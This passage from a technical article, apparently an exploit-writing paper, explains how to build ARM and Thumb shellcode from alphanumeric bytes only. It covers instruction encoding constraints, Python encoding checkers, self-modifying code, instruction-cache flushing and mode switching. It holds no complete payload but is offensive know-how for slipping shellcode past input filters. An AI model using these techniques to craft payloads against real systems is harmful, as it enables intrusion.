|STRH       |4+      |d |d |d |0 |IO: 7                      |
|STRT       |        |d |0 |1 |0 |IZ: 22, 20                 |
|SUB        |        |0 |1 |0 |d |                           |
|SWI        |        |d |d |d |d |                           |
|SWP        |2a, 3+  |0 |0 |0 |0 |IZ: 22-21, IO: 7           |
|SWPB       |2a, 3+  |0 |1 |0 |0 |IO: 7                      |
|SXTAB      |6+      |1 |0 |1 |0 |IO: 23                     |
|SXTAB16    |6+      |1 |0 |0 |0 |IO: 23                     |
|SXTAH      |6+      |1 |0 |1 |1 |IO: 23                     |
|SXTB       |6+      |1 |0 |1 |0 |IO: 23                     |
|SXTB16     |6+      |1 |0 |0 |0 |IO: 23                     |
|SXTH       |6+      |1 |0 |1 |1 |IO: 23                     |
|TEQ        |        |0 |0 |1 |1 |SZ: 14-13                  |
|TST        |        |0 |0 |0 |1 |IZ: 22-21, SZ: 14-13       |
|UADD16     |6+      |0 |1 |0 |1 |IZ: 6-5                    |
|UADD8      |6+      |0 |1 |0 |1 |IO: 7                      |
|UADDSUBX   |6+      |0 |1 |0 |1 |                           |
|UHADD16    |6+      |0 |1 |1 |1 |IZ: 6-5                    |
|UHADD8     |6+      |0 |1 |1 |1 |IO: 7                      |
|UHADDSUBX  |6+      |0 |1 |1 |1 |                           |
|UHSUB16    |6+      |0 |1 |1 |1 |                           |
|UHSUB8     |6+      |0 |1 |1 |1 |IO: 7                      |
|UHSUBADDX  |6+      |0 |1 |1 |1 |                           |
|UMAAL      |6+      |0 |1 |0 |0 |IO: 7                      |
|UMLAL      |        |1 |0 |1 |d |IO: 23, 7                  |
|UMULL      |        |1 |0 |0 |d |IO: 23, 7                  |
|UQADD16    |6+      |0 |1 |1 |0 |IZ: 6-5                    |
|UQADD8     |6+      |0 |1 |1 |0 |IO: 7                      |
|UQADDSUBX  |6+      |0 |1 |1 |0 |                           |
|UQSUB16    |6+      |0 |1 |1 |0 |                           |
|UQSUB8     |6+      |0 |1 |1 |0 |IO: 7                      |
|UQSUBADDX  |6+      |0 |1 |1 |0 |                           |
|USAD8      |6+      |1 |0 |0 |0 |IO: 23, 15, IZ: 6-5        |
|USADA8     |6+      |1 |0 |0 |0 |IO: 23, IZ: 6-5            |
|USAT       |6+      |1 |1 |1 |d |IO: 23                     |
|USAT16     |6+      |1 |1 |1 |0 |IO: 23                     |
|USUB16     |6+      |0 |1 |0 |1 |                           |
|USUB8      |6+      |0 |1 |0 |1 |IO: 7                      |
|USUBADDX   |6+      |0 |1 |0 |1 |                           |
|UXTAB      |6+      |1 |1 |1 |0 |IO: 23                     |
|UXTAB16    |6+      |1 |1 |0 |0 |IO: 23                     |
|UXTAH      |6+      |1 |1 |1 |1 |IO: 23                     |
|UXTB       |6+      |1 |1 |1 |0 |IO: 23                     |
|UXTB16     |6+      |1 |1 |0 |0 |IO: 23                     |
|UXTH       |6+      |1 |1 |1 |1 |IO: 23                     |
+-----------+--------+--+--+--+--+---------------------------+

From the list of 147 instructions that are present in the latest revision of the ARM documentation, we will now remove all instructions that require a specific ARM architecture version and all the instructions that we have disqualified
because their bit patterns are incompatible with alphanumeric
characters. This leaves us with 18 instructions, as listed in the
reference manual: B/BL, CDP, EOR, LDC, LDM(1), LDM(2), LDR, LDRB, LDRBT,
LDRT, MCR, MRC, RSB, STM(2), STRB, STRBT, SUB, SWI.

There are a few instructions listed here that are of limited use to us
though:

- B/BL: the branch instruction is of limited use to us in most cases.
  The last 24 bits of this instruction are taken and then shifted left
  two positions (because instructions must always start at a multiple of
  4). The result is then added to the program counter and execution
  continues at that location. To make this offset alphanumeric, we would
  have to jump at least 12MB from our current location. This limits the
  usefulness of the instruction, since we will not always be able to
  control memory that is at least 12MB from our shellcode.

- CDP: is used to tell the coprocessor to do some kind of data
  processing. Since we cannot be sure which coprocessors are available
  on a specific platform, we discard this instruction as well.

- LDC: the load coprocessor instruction loads data from a consecutive
  range of memory addresses into a coprocessor. It depends on a
  coprocessor in the same way as CDP does.

- MCR/MRC: move data between coprocessor registers and ARM registers.
  While these instructions could be useful for caching purposes (more on
  this later), they are privileged before ARMv6.

We are now left with 13 instructions: EOR, LDM(1), LDM(2), LDR, LDRB,
LDRBT, LDRT, RSB, STM, STRB, STRBT, SUB, SWI.

We now group together the instructions that have the same basic
functionality and differ only in the details. For instance, LDR loads a
word from memory into a register whereas LDRB loads a byte into the
least significant byte of a register.
We get the following:

- EOR: Exclusive OR
- LDM (LDM(1), LDM(2)): Load multiple registers from consecutive memory
  locations
- LDR (LDR, LDRB, LDRBT, LDRT): Load a value from memory into a register
- STM: Store multiple registers to consecutive memory locations
- STR (STRB, STRBT): Store a register to memory
- SUB (SUB, RSB): Subtract
- SWI: Software Interrupt a.k.a. do a system call

Unfortunately, the instructions in the above list are not always
alphanumeric. Depending on which operands are used, these instructions
may still generate non-alphanumeric characters. Hence, some additional
constraints must be specified for each instruction. Below, we discuss
these constraints for the instructions in the groups.

- EOR:

  Syntax: EOR{<cond>}{S} <Rd>, <Rn>, <shifter_operand>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
  |cond | 0| 0| I| 0| 0| 0| 1| S| Rn  | Rd  | shifter_operand   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+

  In order for the second byte to be alphanumeric, the S bit must be set
  to 1. If this bit is set to 0, the resulting value would be less than
  48, which is not alphanumeric. Rn also cannot be a register higher
  than R9. Since Rd is encoded in the first four bits of the third byte,
  it may not start with a 1. This means that only the low registers can
  be used. In addition, registers R0 to R2 cannot be used, because this
  would generate a byte that is too low to be alphanumeric. The shifter
  operand must be tweaked such that its most significant four bits
  generate a valid alphanumeric character in combination with Rd. The
  eight least significant bits are, of course, also significant as they
  fully determine the fourth byte of the instruction. Details about the
  shifter operand can be found in the ARM architecture reference manual.
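The EOR constraints above can be checked by assembling the instruction by
hand. The following Python sketch does this for the immediate form of
EORS. The helper names (is_alnum, encode_eors_imm) are our own and not
part of any toolchain, and the PL condition code is assumed here only
because it yields an alphanumeric first byte; bytes are listed from bit
31 downwards, matching the "first byte" convention used in the text.

```python
import string

# The 62 byte values that count as alphanumeric: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode())

def is_alnum(word):
    """True if all four bytes of a 32-bit instruction word are alphanumeric."""
    return all(b in ALNUM for b in word.to_bytes(4, "big"))

def encode_eors_imm(cond, rd, rn, rotate, imm8, s=1):
    """Hand-assemble EOR{S} <Rd>, <Rn>, #imm (I bit = 1, opcode 0001)."""
    return (cond << 28 | 1 << 25 | 0b0001 << 21 | s << 20 |
            rn << 16 | rd << 12 | rotate << 8 | imm8)

PL = 0b0101  # assumed condition code; first byte becomes 0x52 ('R')

# EORPLS r3, r4, #48
word = encode_eors_imm(PL, rd=3, rn=4, rotate=0, imm8=0x30)
print(hex(word), word.to_bytes(4, "big"), is_alnum(word))

# Breaking any single constraint from the text produces a bad byte.
no_s_bit = encode_eors_imm(PL, rd=3, rn=4, rotate=0, imm8=0x30, s=0)
rd_is_r0 = encode_eors_imm(PL, rd=0, rn=4, rotate=0, imm8=0x30)
rn_is_r10 = encode_eors_imm(PL, rd=3, rn=10, rotate=0, imm8=0x30)
print(is_alnum(no_s_bit), is_alnum(rd_is_r0), is_alnum(rn_is_r10))
```

The same helper can be pointed at other register and immediate choices
to see which operand combinations survive.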
- LDM(1):

  Syntax: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>

   31 28 27 26 25 24 23 22 21 20 19  16 15            0
  +-----+--+--+--+--+--+--+--+--+------+---------------+
  |cond | 1| 0| 0| P| U| 0| W| 1| Rn   | register list |
  +-----+--+--+--+--+--+--+--+--+------+---------------+

  LDM(2):

  Syntax: LDM{<cond>}<addressing_mode> <Rn>, <registers_without_pc>^

   31 28 27 26 25 24 23 22 21 20 19  16 15 14            0
  +-----+--+--+--+--+--+--+--+--+------+--+---------------+
  |cond | 1| 0| 0| P| U| 1| 0| 1| Rn   | 0| register list |
  +-----+--+--+--+--+--+--+--+--+------+--+---------------+

  The list of registers that are loaded from memory is encoded in the
  last two bytes of the instruction. As a result, not every list of
  registers can be used. In particular, for the low registers, R7 can
  never be used. R6 or R5 must be used, and if R6 is not used, R4 must
  be used. The same goes for the high registers. Additionally, the U bit
  must be set to 0 and, for LDM(1), the W bit must be set to 1, to
  ensure that the second byte of the instruction is alphanumeric. For
  Rn, registers R0 to R9 can be used with LDM(1), and R0 to R10 can be
  used with LDM(2).
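The register list rules can be derived mechanically: each byte of the
list must itself be an alphanumeric character. The Python sketch below
enumerates every usable low byte (R0-R7) and checks the rules stated
above. The names regs_in, low_lists and with_r0_r2 are ours and purely
illustrative.

```python
import string

# The 62 byte values that count as alphanumeric: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode())

def regs_in(byte, base=0):
    """Registers selected by one byte of the LDM register list."""
    return {base + i for i in range(8) if byte >> i & 1}

# Every alphanumeric byte is a usable low half (R0-R7) of the list.
low_lists = {b: regs_in(b) for b in sorted(ALNUM)}

for byte, regs in low_lists.items():
    assert 7 not in regs              # bit 7 set is never alphanumeric
    assert 5 in regs or 6 in regs     # below 0x30 is never alphanumeric
    if 6 not in regs:
        assert {4, 5} <= regs         # only the digits '0'-'9' remain

# Lists that cover all of R0-R2, which section 2.5 relies on.
with_r0_r2 = {chr(b): sorted(r) for b, r in low_lists.items()
              if {0, 1, 2} <= r}
print(len(low_lists), with_r0_r2)
```

Passing base=8 to regs_in gives the same picture for the high byte
(R8-R15) of the list.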
- LDR:

  Syntax: LDR{<cond>} <Rd>, <addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| P| U| 0| W| 1| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  LDRB:

  Syntax: LDR{<cond>}B <Rd>, <addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| P| U| 1| W| 1| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  LDRBT:

  Syntax: LDR{<cond>}BT <Rd>, <post_indexed_addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| 0| U| 1| 1| 1| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  LDRT:

  Syntax: LDR{<cond>}T <Rd>, <post_indexed_addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| 0| U| 0| 1| 1| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  The details of the addressing mode are described in the ARM reference
  manual and will not be repeated here for brevity's sake. However, the
  addressing mode must be specified in such a way that the fourth byte
  of the instruction is alphanumeric, and the least significant four
  bits of the third byte generate a valid character in combination with
  Rd. Rd cannot be one of the high registers, and cannot be R0-R2. The U
  bit must also be 0.
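To make the load constraints concrete, the Python sketch below assembles
an immediate-offset LDRB by hand, using the bit layout shown above, and
checks the resulting bytes. The function names are our own, and the PL
condition code is again an assumption chosen only because it keeps the
first byte alphanumeric. With U = 0 the offset is subtracted, so an
offset field of 48 corresponds to #-48.

```python
import string

# The 62 byte values that count as alphanumeric: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode())

def is_alnum(word):
    """True if all four bytes of a 32-bit instruction word are alphanumeric."""
    return all(b in ALNUM for b in word.to_bytes(4, "big"))

def encode_ldrb_imm(cond, rd, rn, offset12, u=0, p=1, w=0):
    """Hand-assemble LDR{cond}B <Rd>, [<Rn>, #offset] (I = 0, B = 1, L = 1)."""
    return (cond << 28 | 0b01 << 26 | p << 24 | u << 23 | 1 << 22 |
            w << 21 | 1 << 20 | rn << 16 | rd << 12 | offset12)

PL = 0b0101  # assumed condition code; first byte becomes 0x55 ('U')

# LDRPLB r3, [r3, #-48]
word = encode_ldrb_imm(PL, rd=3, rn=3, offset12=48)
print(hex(word), word.to_bytes(4, "big"), is_alnum(word))

# A positive offset (U = 1) or a destination of R0 breaks the encoding.
u_set = encode_ldrb_imm(PL, rd=3, rn=3, offset12=48, u=1)
rd_is_r0 = encode_ldrb_imm(PL, rd=0, rn=3, offset12=48)
print(is_alnum(u_set), is_alnum(rd_is_r0))
```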
- STM:

  Syntax: STM{<cond>}<addressing_mode> <Rn>, <registers>^

   31 28 27 26 25 24 23 22 21 20 19  16 15            0
  +-----+--+--+--+--+--+--+--+--+------+---------------+
  |cond | 1| 0| 0| P| U| 1| 0| 0| Rn   | register list |
  +-----+--+--+--+--+--+--+--+--+------+---------------+

  STRB:

  Syntax: STR{<cond>}B <Rd>, <addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| P| U| 1| W| 0| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  STRBT:

  Syntax: STR{<cond>}BT <Rd>, <post_indexed_addressing_mode>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11          0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
  |cond | 0| 1| I| 0| U| 1| 1| 0| Rn  | Rd  | addr_mode   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+

  The structure of STM is very similar to the structure of the LDM
  operation, and the structure of STRB(T) is very similar to LDRB(T).
  Hence, comparable constraints apply. The only difference is that other
  values for Rn must be used in order to generate an alphanumeric
  character for the second byte of the instruction.

- SUB:

  Syntax: SUB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
  |cond | 0| 0| I| 0| 0| 1| 0| S| Rn  | Rd  | shifter_operand   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+

  RSB:

  Syntax: RSB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>

   31 28 27 26 25 24 23 22 21 20 19 16 15 12 11                0
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
  |cond | 0| 0| I| 0| 0| 1| 1| S| Rn  | Rd  | shifter_operand   |
  +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+

  To get the second byte of the instruction to be alphanumeric, Rn and
  the S bit must be set accordingly. In addition, Rd cannot be one of
  the high registers, or R0-R2.
  As with the previous instructions, we refer you to the ARM
  architecture reference manual for a detailed description of the
  shifter operand.

- SWI:

  Syntax: SWI{<cond>} <immed_24>

   31 28 27 26 25 24 23                         0
  +-----+--+--+--+--+----------------------------+
  |cond | 1| 1| 1| 1| immed_24                   |
  +-----+--+--+--+--+----------------------------+

  As will become clear further in the article, it was essential for us
  that the first byte of the SWI call is alphanumeric. Fortunately, this
  can be accomplished by using one of the condition codes discussed in
  the previous section. The other three bytes are fully determined by
  the immediate value that is passed as the operand of the SWI
  instruction.

----[ 2.4 Getting a known value in a register

When our shellcode starts executing, we are faced with a problem: we do
not know which values the registers contain. So we must place our own
value in a register, but we don't have any traditional instructions for
doing this. We can't use MOV because that is not alphanumeric. So we
must make do with our remaining instructions.

If we look at our arithmetic instructions, we can't EOR or SUB a
register with/from itself to get a 0 into a register, as using 3
registers as arguments is not alphanumeric. We could EOR or SUB with an
immediate, but we don't know the values in the registers so we can't
give an appropriate immediate which will return the expected value.
Given that these are our only arithmetic instructions, we can't
arithmetically get a known value into a register.

So our approach has been to use LDR. Since we know which code we're
writing, we can use our shellcode as data and load a byte from the
shellcode into a register. This is done as follows:

        SUB  r3, pc, #48
        LDRB r3, [r3, #-48]

PC will always point to our shellcode, however we can't directly access
it in an LDR instruction as this would result in non-alphanumeric code.
So we copy PC to R3 by subtracting 48 from PC.
Then we use R3 in our LDRB instruction to load a known byte from our
shellcode into R3 (we use an immediate offset to ensure that the last
byte of the instruction is alphanumeric). Once this is done we can use
R3 as the basis for loading values into other registers. If the byte we
loaded is 48, subtracting 48 from R3 will give us 0, subtracting 49 will
give us -1, performing an exclusive or with a known value will give us
another known value, etc.

----[ 2.5 Writing to R0-R2

One of the constraints mentioned in section 2.3, on most instructions
that have an Rd operand, is that registers R0 to R2 cannot be used as
destination register. The reason is that the destination register is
encoded in the four most significant bits of the third byte of an
instruction. If these bits are set to the value 0, 1 or 2, this would
generate a byte that is not alphanumeric.

On ARM processors, registers R0 to R3 are used to transfer parameters to
function calls. If the function has more than 4 parameters, the
additional parameters are pushed to the stack. This poses a problem for
us, because we will need to populate registers R0 to R3 in our
shellcode, in order to pass arguments to functions and system calls.
However, it's not easy to write to these registers, because most
operations do not support having R0-R2 as a destination register.

There is, however, one operation that we can use to write to the three
lowest registers, without generating non-alphanumeric instructions. The
LDM instruction loads values from the stack into multiple registers. It
encodes the list of registers it needs to write to in the last two bytes
of the instruction. Hence, if bits 0 to 2 are set, registers R0 to R2
will be written to. In order to get the bytes of the instruction to
become alphanumeric, we have to add some other registers to the list.
In the example shellcode, we will use registers R3 to R7 to do our
calculations, store the results to the stack, and then load the results
in R0 to R2 with the LDM instruction.

Thumb mode doesn't suffer from this problem, because the destination
register is encoded differently.

----[ 2.6 Self-modifying Code

With the instructions that remain after discarding all non-alphanumeric
bytes, it's pretty hard to write interesting shellcode. There's only
limited support for arithmetic operations, which makes it difficult to
do the calculations that are necessary to make system calls. In
addition, there's no usable branch instruction either, making loops
impossible. So it seems that we are not even Turing complete.

An interesting option would be to switch from the ARM to the Thumb
instruction set. Since Thumb instructions are shorter, it is likely that
more instructions are available for this instruction set. However, in
order to go from ARM to Thumb mode, we need the BX instruction, which
executes a branch and an optional exchange of processor state. This
instruction is, however, not alphanumeric in ARM mode.

Another possibility is to write self-modifying code. The basic idea is
to compute and write non-alphanumeric instructions to memory, using only
alphanumeric instructions. Then, when the desired code is written in
memory, simply jump to the instructions to execute them.

Let's take a look at an example. To keep this simple, we consider here
non-alphanumeric shellcode in which only null bytes are not allowed.
Imagine you want to execute the instruction:

        mov r0, #0

The resulting bytes for this instruction are 0xe3a00000. Since there are
two null bytes in this instruction, we will either need another
instruction or self-modifying code.
In this example, we will use self-modifying code:

        ldrh r1, [pc, #6]
        eor  r1, #384
        strh r1, [pc, #-2]
        .byte 0xe3, 0xa0, 0x80, 0x01

In this short code fragment, we load the 0x80 and 0x01 bytes in register
R1, we XOR them with 384 (which results in the value 0), and we store
the result back over the original instruction. This code has no null
bytes in it anymore.

----[ 2.7 The Instruction Cache

ARM processors have an instruction cache which makes writing
self-modifying code hard to do since all the instructions that are being
executed will most likely already have been cached. The Intel
architecture has a specific requirement to be compatible with
self-modifying code and as such, will make sure that when code is
modified in memory the cache that possibly contains those instructions
is invalidated. ARM has no such requirement, which means that the
instructions that have been modified in memory could be different from
the instructions that are actually executed since they could have been
cached. Given the size of the instruction cache (16KB on our processor),
and the proximity of the modified instructions, it is very hard to write
self-modifying shellcode without having to flush the instruction cache.

One way of ensuring that we can bypass the instruction cache is to use
the MCR instruction, which allows us to move a register to the system
coprocessor and is alphanumeric. We can set a specific bit in a register
and then move that register to the status register of the system
coprocessor, allowing us to turn off the instruction cache. However, as
we mentioned in section 2.3, this instruction is privileged before
ARMv6. Because it is not usable in all shellcode as such, we will not
discuss it.
These cache issues and the fact that we can't just turn off the cache
are the reasons why it was essential that the SWI instruction can be
represented alphanumerically: we can't modify the SWI instruction in
memory before flushing the cache, but we will need this instruction to
perform a flush of the instruction cache. On ARM/Linux, the system call
for a cache flush is 0x9F0002. None of these bytes are alphanumeric and
since they are issued as part of an instruction this could result in a
problem for our self-modifying code. However, SWI generates a software
interrupt and to the interrupt handler, 0x9F0002 is actually data and as
a result will not be read via the instruction cache, so if we modify the
argument to SWI in our self-modifying code, the argument will be read
correctly.

In non-alphanumeric code, we would flush the instruction cache with this
sequence of operations:

        mov r0, #0
        mov r1, #-1
        mov r2, #0
        swi 0x9F0002

Since these instructions generate a number of non-alphanumeric
characters, we will need self-modifying code techniques to use this in
the shellcode.

----[ 2.8 Going to Thumb Mode

As discussed in section 1.5, we don't need to go into Thumb mode to make
our shellcode work, but it is more convenient since we only need to make
2 bytes alphanumeric per instruction rather than 4. Below is an example
that will get us into Thumb mode:

        sub r6, pc, #-1
        bx  r6

However, the BX instruction is not alphanumeric, so we must overwrite
our shellcode to execute the correct instruction. We must modify this
instruction before executing the system call to flush the instruction
cache.

Below is the list of Thumb instructions and their constraints with
respect to processor version and whether they can be represented
alphanumerically.
+-------------+---------+--------------+
| instruction | version | disqualifier |
+-------------+---------+--------------+
| ADC         |         |              |
| ADD (1)     |         | IZ: 14-13    |
| ADD (2)     |         |              |
| ADD (3)     |         | IZ: 14-13    |
| ADD (4)     |         |              |
| ADD (5)     |         | IO: 15       |
| ADD (6)     |         | IO: 15       |
| ADD (7)     |         | IO: 15       |
| AND         |         | Pattern is @ |
| ASR (1)     |         | IZ: 14-13    |
| ASR (2)     |         |              |
| B (1)       |         | IO: 15       |
| B (2)       |         | IO: 15       |
| BIC         |         | IO: 7        |
| BKPT        | 5T+     | IO: 15       |
| BL          |         | IO: 15       |
| BLX (1)     | 5T+     | IO: 15       |
| BLX (2)     | 5T+     | IO: 7        |
| BX          |         |              |
| CMN         |         | IO: 7        |
| CMP (1)     |         |              |
| CMP (2)     |         | IO: 7        |
| CMP (3)     |         |              |
| CPS         | 6+      | IO: 7        |
| CPY         | 6+      |              |
| EOR         |         | Pattern is @ |
| LDMIA       |         | IO: 15       |
| LDR (1)     |         |              |
| LDR (2)     |         |              |
| LDR (3)     |         |              |
| LDR (4)     |         | IO: 15       |
| LDRB (1)    |         |              |
| LDRB (2)    |         |              |
| LDRH (1)    |         | IO: 15       |
| LDRH (2)    |         |              |
| LDRSB       |         |              |
| LDRSH       |         |              |
| LSL (1)     |         | IZ: 14-13    |
| LSL (2)     |         | IO: 7        |
| LSR (1)     |         | IZ: 14-13    |
| LSR (2)     |         | IO: 7        |
| MOV (1)     |         | IZ: 14,12    |
| MOV (2)     |         | IZ: 14-13    |
| MOV (3)     |         |              |
| MUL         |         |              |
| MVN         |         | IO: 7        |
| NEG         |         |              |
| ORR         |         |              |
| POP         |         | IO: 15       |
| PUSH        |         | IO: 15       |
| REV         | 6+      | IO: 15       |
| REV16       | 6+      | IO: 15       |
| REVSH       | 6+      | IO: 15       |
| ROR         |         | IO: 7        |
| SBC         |         | IO: 7        |
| SETEND      | 6+      | IO: 15       |
| STMIA       |         | IO: 15       |
| STR (1)     |         |              |
| STR (2)     |         |              |
| STR (3)     |         | IO: 15       |
| STRB (1)    |         |              |
| STRB (2)    |         |              |
| STRH (1)    |         | IO: 15       |
| STRH (2)    |         |              |
| SUB (1)     |         | IZ: 14-13    |
| SUB (2)     |         |              |
| SUB (3)     |         | IZ: 14-13    |
| SUB (4)     |         | IO: 15       |
| SWI         |         | IO: 15       |
| SXTB        | 6+      | IO: 15       |
| SXTH        | 6+      | IO: 15       |
| TST         |         |              |
| UXTB        | 6+      | IO: 15       |
| UXTH        | 6+      | IO: 15       |
+-------------+---------+--------------+

If we remove instructions which are not available on all ARM
architectures, cannot be represented alphanumerically or require special
hardware, and then group together the instructions with similar
purposes, we get the following list of instructions:

- ADC: Add with Carry
- ADD: Add
- ASR: Arithmetic Shift Right
- BX: Branch and Exchange
- CMP: Compare
- LDR: Load Register
- MOV: Move
- MUL: Multiply
- NEG: Negate
- ORR: Logical Or
- STR: Store Register
- SUB: Subtract
- TST: Test

As you can see we have a lot more instructions available in Thumb mode
than we did in ARM mode. However, there are many constraints on the use
of these instructions. For every instruction we can only use specific
registers or specific values. The constraints here are more esoteric
than they are for ARM because of the limited size of instructions. We
will go over each instruction and its limitations.

- ADC:

  Syntax: ADC <Rd>, <Rm>

   15 14 13 12 11 10  9  8  7  6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+--+-----+-----+
  | 0| 1| 0| 0| 0| 0| 0| 1| 0| 1| Rm  | Rd  |
  +--+--+--+--+--+--+--+--+--+--+-----+-----+

  Since bit 7 is set to 0 and bit 6 is set to 1, we can use most
  combinations of low registers for Rm and Rd. We must exclude the
  combinations that make the second byte non-alphanumeric: R0 as both Rm
  and Rd, since that would result in 0x40 or an '@', and the
  combinations that land in the ranges 0x5b-0x60 (Rm = R3 with Rd =
  R3-R7, and Rm = R4 with Rd = R0) and 0x7b-0x7f (Rm = R7 with Rd =
  R3-R7). The main problem with this instruction is that we must know
  the value of the carry flag as it will be added to the result of the
  addition.

- ADD: There are seven versions of the Thumb mode ADD instruction listed
  in the reference manual. We will refer to them as the reference manual
  does, i.e. ADD (1) to ADD (7). ADD (1), ADD (3), ADD (5), ADD (6) and
  ADD (7) cannot be used because their first byte is not alphanumeric.
  This leaves us with:

  - ADD (2): adds a constant value to a register.

    Syntax: ADD <Rd>, #<imm_8>

     15 14 13 12 11 10  8 7             0
    +--+--+--+--+--+-----+---------------+
    | 0| 0| 1| 1| 0| Rd  | imm_8         |
    +--+--+--+--+--+-----+---------------+

    Rd can be any low register but imm_8 must follow the constraints of
    being alphanumeric:
    - 47 < imm_8 < 123
    - imm_8 is not 58-64 or 91-96.

  - ADD (4): adds the value of two registers of which one or both must
    be a high register.
    Syntax: ADD <Rd>, <Rm>

     15 14 13 12 11 10  9  8   7   6 5   3 2   0
    +--+--+--+--+--+--+--+--+---+---+-----+-----+
    | 0| 1| 0| 0| 0| 1| 0| 0| H1| H2| Rm  | Rd  |
    +--+--+--+--+--+--+--+--+---+---+-----+-----+

    With H1 = 1 if Rd is a high register and H2 = 1 if Rm is a high
    register. In our case the destination register, Rd, may not be a
    high register because that would set bit 7 of the instruction to 1.
    As a result, we can only use this instruction to add the contents of
    a high register to a low one. However, since bit 7 must be 0 and bit
    6 must be 1, we can't use register R8 as Rm and R0 as Rd together
    (i.e. we can't do ADD r0, r8) since that would result in the second
    byte being an '@'. The same holds for any other register pair that
    puts the second byte in the ranges 0x5b-0x60 or 0x7b-0x7f, such as
    ADD r3, r11. In theory we could use this instruction to add 2 low
    registers to each other, since for some registers the encoding would
    still be alphanumeric. However, the reference manual specifies that
    if both registers are low, then the result is unpredictable. So the
    behavior may vary from one processor version to the next.

- ASR: There are two versions of ASR, ASR (1) and (2) respectively.
  ASR (1) allows the shifting of a register by a constant, however this
  is not alphanumeric. So we must use the second version of this
  instruction, ASR (2), which shifts a register based on the value in
  another register.

  Syntax: ASR <Rd>, <Rs>

   15 14 13 12 11 10  9  8  7  6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+--+-----+-----+
  | 0| 1| 0| 0| 0| 0| 0| 1| 0| 0| Rs  | Rd  |
  +--+--+--+--+--+--+--+--+--+--+-----+-----+

  Since bits 7 and 6 of ASR are 0, the top 2 bits of Rs must be 1. This
  means that Rs must be either R6 or R7. If Rs is R7, then Rd can only
  be R0 or R1, because the second byte would otherwise be larger than
  '9' (0x39).

- BX:

  Syntax: BX <Rm>

   15 14 13 12 11 10  9  8  7   6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+---+-----+-----+
  | 0| 1| 0| 0| 0| 1| 1| 1| 0| H2| Rm  | SBZ |
  +--+--+--+--+--+--+--+--+--+---+-----+-----+

  The branch and exchange instruction can be used to enter ARM mode.
  This is useful if we have code which starts off in Thumb mode: since
  SWI is not alphanumeric in Thumb, we can't flush the cache if we write
  self-modifying code. We can, however, use the BX instruction to get
  into ARM mode, where the SWI instruction is alphanumeric. We discuss
  this in more detail below. If bit 6 is 0, we must have bits 5 and 4
  set to 1, which means that we can only use R6 and R7 from the low
  registers. For the high registers we can use R9, R10, R11, R13, R14
  and R15.

- CMP: There are three versions of CMP: CMP (1) to CMP (3). CMP (2) is
  not alphanumeric.

  - CMP (1) compares a register to an immediate.

    Syntax: CMP <Rn>, #<imm_8>

     15 14 13 12 11 10  8 7             0
    +--+--+--+--+--+-----+---------------+
    | 0| 0| 1| 0| 1| Rn  | imm_8         |
    +--+--+--+--+--+-----+---------------+

    As with ADD (2), Rn can be any low register but imm_8 must follow
    the constraints of being alphanumeric:
    - 47 < imm_8 < 123
    - imm_8 is not 58-64 or 91-96.

  - CMP (3) compares the value of two registers of which one or both
    must be a high register.

    Syntax: CMP <Rn>, <Rm>

     15 14 13 12 11 10  9  8   7   6 5   3 2   0
    +--+--+--+--+--+--+--+--+---+---+-----+-----+
    | 0| 1| 0| 0| 0| 1| 0| 1| H1| H2| Rm  | Rn  |
    +--+--+--+--+--+--+--+--+---+---+-----+-----+

    The same restrictions apply as for ADD (4). In our case Rn may not
    be a high register because that would set bit 7 of the instruction
    to 1. As a result, we can only use this instruction to compare the
    contents of a high register to a low one. As with ADD, Rm cannot be
    R8 if Rn is R0, and comparing two low registers is unpredictable.

- LDR: There are many versions of this instruction: LDR (1) to LDR (4),
  LDRB (1), LDRB (2), LDRH (1), LDRH (2), LDRSB and LDRSH. Of these,
  LDR (4) and LDRH (1) are ruled out by bit 15. As the bit patterns
  given below for each version show, the first byte of LDRB (2) and
  LDRSH is not alphanumeric either.

  - LDR (1) loads a word from a memory address stored in a register into
    another register. A word offset of at most 5 bits (i.e. the value is
    multiplied by 4) can be added to the register containing the memory
    address.
    Syntax: LDR <Rd>, [<Rn>, #<imm_5> * 4]

     15 14 13 12 11 10       6 5   3 2   0
    +--+--+--+--+--+----------+-----+-----+
    | 0| 1| 1| 0| 1| imm_5    | Rn  | Rd  |
